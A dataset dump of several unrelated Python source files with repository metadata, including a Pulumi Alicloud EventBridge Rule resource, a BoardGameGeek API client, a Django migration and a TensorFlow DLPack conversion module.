"""
The name of event bus.
"""
return pulumi.get(self, "event_bus_name")
@event_bus_name.setter
def event_bus_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "event_bus_name", value)
@property
@pulumi.getter(name="filterPattern")
def filter_pattern(self) -> Optional[pulumi.Input[str]]:
"""
The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
"""
return pulumi.get(self, "filter_pattern")
@filter_pattern.setter
def filter_pattern(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter_pattern", value)
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of rule.
"""
return pulumi.get(self, "rule_name")
@rule_name.setter
def rule_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_name", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def targets(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]]:
"""
The target of rule.
"""
return pulumi.get(self, "targets")
@targets.setter
def targets(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]]]):
pulumi.set(self, "targets", value)
class Rule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
event_bus_name: Optional[pulumi.Input[str]] = None,
filter_pattern: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
targets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]]] = None,
__props__=None):
"""
Provides a Event Bridge Rule resource.
For information about Event Bridge Rule and how to use it, see [What is Rule](https://help.aliyun.com/document_detail/167854.html).
> **NOTE:** Available in v1.129.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_event_bus = alicloud.eventbridge.EventBus("exampleEventBus", event_bus_name="example_value")
example_rule = alicloud.eventbridge.Rule("exampleRule",
event_bus_name=example_event_bus.id,
rule_name=var["name"],
description="test",
filter_pattern="{\"source\":[\"crmabc.newsletter\"],\"type\":[\"UserSignUp\", \"UserLogin\"]}",
targets=[alicloud.eventbridge.RuleTargetArgs(
target_id="tf-test",
endpoint="acs:mns:cn-hangzhou:118938335****:queues/tf-test",
type="acs.mns.queue",
param_lists=[
alicloud.eventbridge.RuleTargetParamListArgs(
resource_key="queue",
form="CONSTANT",
value="tf-testaccEbRule",
),
alicloud.eventbridge.RuleTargetParamListArgs(
resource_key="Body",
form="ORIGINAL",
),
],
)])
```
## Import
Event Bridge Rule can be imported using the id, e.g.
```sh
$ pulumi import alicloud:eventbridge/rule:Rule example <event_bus_name>:<rule_name>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of rule.
:param pulumi.Input[str] event_bus_name: The name of event bus.
:param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
:param pulumi.Input[str] rule_name: The name of rule.
:param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]] targets: The target of rule.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Event Bridge Rule resource.
For information about Event Bridge Rule and how to use it, see [What is Rule](https://help.aliyun.com/document_detail/167854.html).
> **NOTE:** Available in v1.129.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_event_bus = alicloud.eventbridge.EventBus("exampleEventBus", event_bus_name="example_value")
example_rule = alicloud.eventbridge.Rule("exampleRule",
event_bus_name=example_event_bus.id,
rule_name=var["name"],
description="test",
filter_pattern="{\"source\":[\"crmabc.newsletter\"],\"type\":[\"UserSignUp\", \"UserLogin\"]}",
targets=[alicloud.eventbridge.RuleTargetArgs(
target_id="tf-test",
endpoint="acs:mns:cn-hangzhou:118938335****:queues/tf-test",
type="acs.mns.queue",
param_lists=[
alicloud.eventbridge.RuleTargetParamListArgs(
resource_key="queue",
form="CONSTANT",
value="tf-testaccEbRule",
),
alicloud.eventbridge.RuleTargetParamListArgs(
resource_key="Body",
form="ORIGINAL",
),
],
)])
```
## Import
Event Bridge Rule can be imported using the id, e.g.
```sh
$ pulumi import alicloud:eventbridge/rule:Rule example <event_bus_name>:<rule_name>
```
:param str resource_name: The name of the resource.
:param RuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
event_bus_name: Optional[pulumi.Input[str]] = None,
filter_pattern: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
targets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RuleArgs.__new__(RuleArgs)
__props__.__dict__["description"] = description
if event_bus_name is None and not opts.urn:
raise TypeError("Missing required property 'event_bus_name'")
__props__.__dict__["event_bus_name"] = event_bus_name
if filter_pattern is None and not opts.urn:
raise TypeError("Missing required property 'filter_pattern'")
__props__.__dict__["filter_pattern"] = filter_pattern
if rule_name is None and not opts.urn:
raise TypeError("Missing required property 'rule_name'")
__props__.__dict__["rule_name"] = rule_name
__props__.__dict__["status"] = status
if targets is None and not opts.urn:
raise TypeError("Missing required property 'targets'")
__props__.__dict__["targets"] = targets
super(Rule, __self__).__init__(
'alicloud:eventbridge/rule:Rule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
event_bus_name: Optional[pulumi.Input[str]] = None,
filter_pattern: Optional[pulumi.Input[str]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
targets: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]]] = None) -> 'Rule':
"""
Get an existing Rule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of rule.
:param pulumi.Input[str] event_bus_name: The name of event bus.
:param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
:param pulumi.Input[str] rule_name: The name of rule.
:param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]] targets: The target of rule.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RuleState.__new__(_RuleState)
__props__.__dict__["description"] = description
__props__.__dict__["event_bus_name"] = event_bus_name
__props__.__dict__["filter_pattern"] = filter_pattern
__props__.__dict__["rule_name"] = rule_name
__props__.__dict__["status"] = status
__props__.__dict__["targets"] = targets
return Rule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of rule.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="eventBusName")
def event_bus_name(self) -> pulumi.Output[str]:
"""
The name of event bus.
"""
return pulumi.get(self, "event_bus_name")
@property
@pulumi.getter(name="filterPattern")
def filter_pattern(self) -> pulumi.Output[str]:
"""
The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure).
"""
return pulumi.get(self, "filter_pattern")
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> pulumi.Output[str]:
"""
The name of rule.
"""
return pulumi.get(self, "rule_name")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def targets(self) -> pulumi.Output[Sequence['outputs.RuleTarget']]:
"""
The target of rule.
"""
return pulumi.get(self, "targets")
| en | 0.551394 | # coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** The set of arguments for constructing a Rule resource. :param pulumi.Input[str] event_bus_name: The name of event bus. :param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). :param pulumi.Input[str] rule_name: The name of rule. :param pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]] targets: The target of rule. :param pulumi.Input[str] description: The description of rule. :param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. The name of event bus. The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). The name of rule. The target of rule. The description of rule. Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. Input properties used for looking up and filtering Rule resources. :param pulumi.Input[str] description: The description of rule. :param pulumi.Input[str] event_bus_name: The name of event bus. :param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). :param pulumi.Input[str] rule_name: The name of rule. :param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. :param pulumi.Input[Sequence[pulumi.Input['RuleTargetArgs']]] targets: The target of rule. The description of rule. The name of event bus. The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). The name of rule. Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. The target of rule. Provides a Event Bridge Rule resource. For information about Event Bridge Rule and how to use it, see [What is Rule](https://help.aliyun.com/document_detail/167854.html). > **NOTE:** Available in v1.129.0+. ## Example Usage Basic Usage ```python import pulumi import pulumi_alicloud as alicloud example_event_bus = alicloud.eventbridge.EventBus("exampleEventBus", event_bus_name="example_value") example_rule = alicloud.eventbridge.Rule("exampleRule", event_bus_name=example_event_bus.id, rule_name=var["name"], description="test", filter_pattern="{\"source\":[\"crmabc.newsletter\"],\"type\":[\"UserSignUp\", \"UserLogin\"]}", targets=[alicloud.eventbridge.RuleTargetArgs( target_id="tf-test", endpoint="acs:mns:cn-hangzhou:118938335****:queues/tf-test", type="acs.mns.queue", param_lists=[ alicloud.eventbridge.RuleTargetParamListArgs( resource_key="queue", form="CONSTANT", value="tf-testaccEbRule", ), alicloud.eventbridge.RuleTargetParamListArgs( resource_key="Body", form="ORIGINAL", ), ], )]) ``` ## Import Event Bridge Rule can be imported using the id, e.g. ```sh $ pulumi import alicloud:eventbridge/rule:Rule example <event_bus_name>:<rule_name> ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] description: The description of rule. :param pulumi.Input[str] event_bus_name: The name of event bus. :param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). :param pulumi.Input[str] rule_name: The name of rule. :param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]] targets: The target of rule. Provides a Event Bridge Rule resource. For information about Event Bridge Rule and how to use it, see [What is Rule](https://help.aliyun.com/document_detail/167854.html). > **NOTE:** Available in v1.129.0+. ## Example Usage Basic Usage ```python import pulumi import pulumi_alicloud as alicloud example_event_bus = alicloud.eventbridge.EventBus("exampleEventBus", event_bus_name="example_value") example_rule = alicloud.eventbridge.Rule("exampleRule", event_bus_name=example_event_bus.id, rule_name=var["name"], description="test", filter_pattern="{\"source\":[\"crmabc.newsletter\"],\"type\":[\"UserSignUp\", \"UserLogin\"]}", targets=[alicloud.eventbridge.RuleTargetArgs( target_id="tf-test", endpoint="acs:mns:cn-hangzhou:118938335****:queues/tf-test", type="acs.mns.queue", param_lists=[ alicloud.eventbridge.RuleTargetParamListArgs( resource_key="queue", form="CONSTANT", value="tf-testaccEbRule", ), alicloud.eventbridge.RuleTargetParamListArgs( resource_key="Body", form="ORIGINAL", ), ], )]) ``` ## Import Event Bridge Rule can be imported using the id, e.g. ```sh $ pulumi import alicloud:eventbridge/rule:Rule example <event_bus_name>:<rule_name> ``` :param str resource_name: The name of the resource. :param RuleArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. Get an existing Rule resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] description: The description of rule. :param pulumi.Input[str] event_bus_name: The name of event bus. :param pulumi.Input[str] filter_pattern: The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). :param pulumi.Input[str] rule_name: The name of rule. :param pulumi.Input[str] status: Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RuleTargetArgs']]]] targets: The target of rule. The description of rule. The name of event bus. The pattern to match interested events. Event mode, JSON format. The value description is as follows: `stringEqual` mode. `stringExpression` mode. Each field has up to 5 expressions (map structure). The name of rule. Rule status, either Enable or Disable. Valid values: `DISABLE`, `ENABLE`. The target of rule. | 1.989375 | 2 |
kafka_topic_dumper/progress_percentage.py | Cobliteam/kafka-topic-dumper | 6 | 6617436 | <reponame>Cobliteam/kafka-topic-dumper
import logging
import os
import threading
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class ProgressPercentage(object):
def __init__(self, filename, filesize=None):
self._filename = filename
if filesize is not None:
self._size = filesize
else:
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._lock = threading.Lock()
def __call__(self, bytes_amount):
# To simplify we'll assume this is hooked up
# to a single filename.
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
msg = "{:40s} {:10} / {:10} ({:03g}%)"
logger.info(msg.format(
self._filename, self._seen_so_far, self._size,
percentage))
| import logging
import os
import threading
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class ProgressPercentage(object):
def __init__(self, filename, filesize=None):
self._filename = filename
if filesize is not None:
self._size = filesize
else:
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._lock = threading.Lock()
def __call__(self, bytes_amount):
# To simplify we'll assume this is hooked up
# to a single filename.
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
msg = "{:40s} {:10} / {:10} ({:03g}%)"
logger.info(msg.format(
self._filename, self._seen_so_far, self._size,
percentage)) | en | 0.956525 | # To simplify we'll assume this is hooked up # to a single filename. | 2.953835 | 3 |
app/site_manager/__init__.py | KaiserMovet/K-homeServer | 2 | 6617437 | <reponame>KaiserMovet/K-homeServer<gh_stars>1-10
from .main_site import MainSite
| from .main_site import MainSite | none | 1 | 1.016096 | 1 | |
pybgg_json/pybgg_json.py | SnarkAttack/pybgg-json | 1 | 6617438 | <gh_stars>1-10
import json
import datetime
import collections
import xml.etree.ElementTree as ElementTree
import pybgg_json.pybgg_utils as pybgg_utils
from pybgg_json.pybgg_cache import PyBggCache
MIN_DATE = datetime.date.min.strftime("%Y-%m-%d")
MAX_DATE = datetime.date.max.strftime("%Y-%m-%d")
class PyBggInterface(object):
def __init__(self, cache=PyBggCache()):
self.cache = cache
def thing_item_request(self, id, thing_type='', versions=0, videos=0, stats=0, historical=0,
marketplace=0, comments=0, ratingcomments=0, page=1, page_size=100,
date_from=MIN_DATE, date_to=MAX_DATE):
# Date from and date to are not currently supported by BoardGameGeek
thing_items_url = (
f"thing?id={id}&thing_type={thing_type}&versions={versions}&videos={videos}&"
f"stats={stats}&historical={historical}&marketplace={marketplace}&comments={comments}&"
f"ratingcomments={ratingcomments}&page={page}&page_size={page_size}"
)
root = pybgg_utils._make_request(thing_items_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def family_item_request(self, id, family_type=''):
family_items_url = (
f"family?id={id}&type={family_type}"
)
root = pybgg_utils._make_request(family_items_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def forum_list_request(self, id, type='thing'):
forum_list_url = (
f"forumlist?id={id}&type={type}"
)
root = pybgg_utils._make_request(forum_list_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def forum_request(self, id, page=1):
forum_url = (
f"forum?id={id}&page={page}"
)
root = pybgg_utils._make_request(forum_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def thread_request(self, id, min_article_id=0, min_article_date='', count=-1, username=''):
thread_url = (
f"thread?id={id}&minarticleid={min_article_id}&minarticledate={min_article_date}"
)
if count != -1:
thread_url += f"&count={count}"
root = pybgg_utils._make_request(thread_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def user_request(self, name, buddies=0, guilds=0, hot=0, top=0, domain='boardgame', page=1):
user_url = (
f"user?name={name}&buddies={buddies}&guilds={guilds}&hot={hot}&top={top}&"
f"domain={domain}&page={page}"
)
root = pybgg_utils._make_request(user_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def guild_request(self, id, members=0, sorttype='username', page=1):
guild_url = (
f"guild?id={id}&members={members}&sort={sorttype}&page={page}"
)
root = pybgg_utils._make_request(guild_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
# Must use either username or id AND type
def plays_request(self, username=None, id=None, type=None, mindate=MIN_DATE,
maxdate=MAX_DATE, subtype='boardgame', page=1):
if username is None and (id is None or type is None):
return {}
else:
if username is not None:
identifier = f"username={username}"
else:
identifier = f"id={id}&type={type}"
plays_url = (
f"plays?{identifier}&mindate={mindate}&maxdate={maxdate}&subtype={subtype}&"
f"page={page}"
)
root = pybgg_utils._make_request(plays_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def collection_request(self, username, subtype='boardgame', exclude_subtype=None, id=None,
brief=None, stats=None, own=None, rated=None, playerd=None, comment=None,
trade=None, want=None, wishlist=None, wishlist_priority=None, preordered=None,
wanttoplay=None, wanttobuy=None, prevowned=None, hasparts=None, wantparts=None,
minrating=None, rating=None, minbggrating=None, bggrating=None, minplays=None,
maxplays=None, showprivate=None, collid=None, modifiedsince=MIN_DATE):
collection_url = (
f"collection?username={username}&subtype={subtype}"
)
for arg, arg_val in locals().items():
if arg_val is not None:
collection_url += f"{arg}={arg_val}&"
collection_url += f"modifiedsince={modifiedsince}"
root = pybgg_utils._make_request(collection_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root)) | import json
import datetime
import collections
import xml.etree.ElementTree as ElementTree
import pybgg_json.pybgg_utils as pybgg_utils
from pybgg_json.pybgg_cache import PyBggCache
MIN_DATE = datetime.date.min.strftime("%Y-%m-%d")
MAX_DATE = datetime.date.max.strftime("%Y-%m-%d")
class PyBggInterface(object):
def __init__(self, cache=PyBggCache()):
self.cache = cache
def thing_item_request(self, id, thing_type='', versions=0, videos=0, stats=0, historical=0,
marketplace=0, comments=0, ratingcomments=0, page=1, page_size=100,
date_from=MIN_DATE, date_to=MAX_DATE):
# Date from and date to are not currently supported by BoardGameGeek
thing_items_url = (
f"thing?id={id}&thing_type={thing_type}&versions={versions}&videos={videos}&"
f"stats={stats}&historical={historical}&marketplace={marketplace}&comments={comments}&"
f"ratingcomments={ratingcomments}&page={page}&page_size={page_size}"
)
root = pybgg_utils._make_request(thing_items_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def family_item_request(self, id, family_type=''):
family_items_url = (
f"family?id={id}&type={family_type}"
)
root = pybgg_utils._make_request(family_items_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def forum_list_request(self, id, type='thing'):
forum_list_url = (
f"forumlist?id={id}&type={type}"
)
root = pybgg_utils._make_request(forum_list_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def forum_request(self, id, page=1):
forum_url = (
f"forum?id={id}&page={page}"
)
root = pybgg_utils._make_request(forum_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def thread_request(self, id, min_article_id=0, min_article_date='', count=-1, username=''):
thread_url = (
f"thread?id={id}&minarticleid={min_article_id}&minarticledate={min_article_date}"
)
if count != -1:
thread_url += f"&count={count}"
root = pybgg_utils._make_request(thread_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def user_request(self, name, buddies=0, guilds=0, hot=0, top=0, domain='boardgame', page=1):
user_url = (
f"user?name={name}&buddies={buddies}&guilds={guilds}&hot={hot}&top={top}&"
f"domain={domain}&page={page}"
)
root = pybgg_utils._make_request(user_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def guild_request(self, id, members=0, sorttype='username', page=1):
guild_url = (
f"guild?id={id}&members={members}&sort={sorttype}&page={page}"
)
root = pybgg_utils._make_request(guild_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
# Must use either username or id AND type
def plays_request(self, username=None, id=None, type=None, mindate=MIN_DATE,
maxdate=MAX_DATE, subtype='boardgame', page=1):
if username is None and (id is None or type is None):
return {}
else:
if username is not None:
identifier = f"username={username}"
else:
identifier = f"id={id}&type={type}"
plays_url = (
f"plays?{identifier}&mindate={mindate}&maxdate={maxdate}&subtype={subtype}&"
f"page={page}"
)
root = pybgg_utils._make_request(plays_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root))
def collection_request(self, username, subtype='boardgame', exclude_subtype=None, id=None,
brief=None, stats=None, own=None, rated=None, playerd=None, comment=None,
trade=None, want=None, wishlist=None, wishlist_priority=None, preordered=None,
wanttoplay=None, wanttobuy=None, prevowned=None, hasparts=None, wantparts=None,
minrating=None, rating=None, minbggrating=None, bggrating=None, minplays=None,
maxplays=None, showprivate=None, collid=None, modifiedsince=MIN_DATE):
collection_url = (
f"collection?username={username}&subtype={subtype}"
)
for arg, arg_val in locals().items():
if arg_val is not None:
collection_url += f"{arg}={arg_val}&"
collection_url += f"modifiedsince={modifiedsince}"
root = pybgg_utils._make_request(collection_url)
return json.dumps(pybgg_utils._generate_dict_from_element_tree(root)) | en | 0.938812 | # Date from and date to are not currently supported by BoardGameGeek # Must use either username or id AND type | 2.477622 | 2 |
starcraft_agents/distributions.py | ShawnSpooner/starcraft_agents | 3 | 6617439 | import torch
import torch.nn as nn
class Multinoulli(object):
def __init__(self):
super(Multinoulli, self).__init__()
self.neglogp = nn.CrossEntropyLoss()
def entropy(self, logits):
a0 = logits - torch.max(logits)
ea0 = torch.exp(a0)
z0 = ea0.sum(-1, keepdim=True)
p0 = ea0 / z0
return (p0 * (torch.log(z0) - a0)).sum(-1)
def negative_log_probability(self, logits, actions):
return self.neglogp(logits, actions)
| import torch
import torch.nn as nn
class Multinoulli(object):
def __init__(self):
super(Multinoulli, self).__init__()
self.neglogp = nn.CrossEntropyLoss()
def entropy(self, logits):
a0 = logits - torch.max(logits)
ea0 = torch.exp(a0)
z0 = ea0.sum(-1, keepdim=True)
p0 = ea0 / z0
return (p0 * (torch.log(z0) - a0)).sum(-1)
def negative_log_probability(self, logits, actions):
return self.neglogp(logits, actions)
| none | 1 | 2.786385 | 3 | |
betty/cropper/migrations/0001_initial.py | theonion/betty-cropper | 14 | 6617440 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.core.files.storage
import betty.cropper.models
import jsonfield.fields
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('credit', models.CharField(max_length=120, null=True, blank=True)),
('source', models.FileField(storage=django.core.files.storage.FileSystemStorage(base_url='/', location='/private/var/folders/_3/mlzyzxsj5lb617stmlnstkgr0000gp/T/virtualenv.xyQsXv9C/images'), max_length=255, null=True, upload_to=betty.cropper.models.source_upload_to, blank=True)),
('optimized', models.FileField(storage=django.core.files.storage.FileSystemStorage(base_url='/', location='/private/var/folders/_3/mlzyzxsj5lb617stmlnstkgr0000gp/T/virtualenv.xyQsXv9C/images'), max_length=255, null=True, upload_to=betty.cropper.models.optimized_upload_to, blank=True)),
('height', models.IntegerField(null=True, blank=True)),
('width', models.IntegerField(null=True, blank=True)),
('selections', jsonfield.fields.JSONField(null=True, blank=True)),
('jpeg_quality', models.IntegerField(null=True, blank=True)),
('animated', models.BooleanField(default=False)),
],
options={
'permissions': (('read', 'Can search images, and see the detail data'), ('crop', 'Can crop images')),
},
bases=(models.Model,),
),
]
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.core.files.storage
import betty.cropper.models
import jsonfield.fields
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('credit', models.CharField(max_length=120, null=True, blank=True)),
('source', models.FileField(storage=django.core.files.storage.FileSystemStorage(base_url='/', location='/private/var/folders/_3/mlzyzxsj5lb617stmlnstkgr0000gp/T/virtualenv.xyQsXv9C/images'), max_length=255, null=True, upload_to=betty.cropper.models.source_upload_to, blank=True)),
('optimized', models.FileField(storage=django.core.files.storage.FileSystemStorage(base_url='/', location='/private/var/folders/_3/mlzyzxsj5lb617stmlnstkgr0000gp/T/virtualenv.xyQsXv9C/images'), max_length=255, null=True, upload_to=betty.cropper.models.optimized_upload_to, blank=True)),
('height', models.IntegerField(null=True, blank=True)),
('width', models.IntegerField(null=True, blank=True)),
('selections', jsonfield.fields.JSONField(null=True, blank=True)),
('jpeg_quality', models.IntegerField(null=True, blank=True)),
('animated', models.BooleanField(default=False)),
],
options={
'permissions': (('read', 'Can search images, and see the detail data'), ('crop', 'Can crop images')),
},
bases=(models.Model,),
),
]
| en | 0.769321 | # -*- coding: utf-8 -*- | 1.810046 | 2 |
globals.py | DariHernandez/SNIIM-Extractor | 0 | 6617441 | <filename>globals.py
global status
global loading
status = "Loading..."
loading = False
| <filename>globals.py
global status
global loading
status = "Loading..."
loading = False
| none | 1 | 1.275184 | 1 | |
python/tfdlpack/core.py | VoVAllen/tf-dlpack | 39 | 6617442 | <filename>python/tfdlpack/core.py<gh_stars>10-100
# pylint: disable=no-name-in-module, invalid-name, no-member
"""core functions"""
import tensorflow as tf
from tensorflow.python.framework import load_library
from . import libinfo
from .capsule_api import to_capsule, get_capsule_address
# version number
__version__ = libinfo.__version__
# find lib
libname = libinfo.get_libname(tf.__version__)
dlpack_ops = load_library.load_op_library(libinfo.find_lib_path(libname)[0])
_to_dlpack_address = dlpack_ops.to_dlpack
_from_dlpack = dlpack_ops.from_dlpack
_get_device_and_dtype = dlpack_ops.get_device_and_dtype
_destruct_dlpack = dlpack_ops.destruct_dlpack
def _destruct_capsule(dlm_address):
with tf.device("cpu"):
_destruct_dlpack(dlm_address)
def to_dlpack(tf_tensor):
"""Convert the given tensorflow tensor to DLPack format.
"""
with tf.device(tf_tensor.device):
cap = to_capsule(_to_dlpack_address(tf_tensor))
return cap
def get_device_and_dtype(dl_capsule):
"""Get capsule's device and its corresponding dtype
First element is device type and second is device id (according to DLPack protocal)
Third element is the tf data type (can be convert to tf type by tf.DType(d) )
"""
ptr = get_capsule_address(dl_capsule)
with tf.device('/cpu:0'):
ad_tensor = tf.constant([ptr], dtype=tf.uint64)
return _get_device_and_dtype(ad_tensor).numpy()
def from_dlpack(dl_capsule):
"""Convert capsule to tf tensor"""
device_and_dtype = get_device_and_dtype(dl_capsule)
device = device_and_dtype[:2]
dtype = device_and_dtype[2]
ptr = get_capsule_address(dl_capsule, consume=True)
if device[0] == 1:
tf_device_type = "cpu"
tf_device_id = int(device[1])
elif device[0] == 2:
tf_device_type = "gpu"
tf_device_id = int(device[1])
else:
raise RuntimeError("Unsupported Device")
tf_device = "/{}:{}".format(tf_device_type, tf_device_id)
with tf.device("cpu:0"):
ad_tensor = tf.constant([ptr], dtype=tf.uint64)
with tf.device(tf_device):
tf_tensor = _from_dlpack(ad_tensor, T=tf.DType(dtype))
return tf_tensor
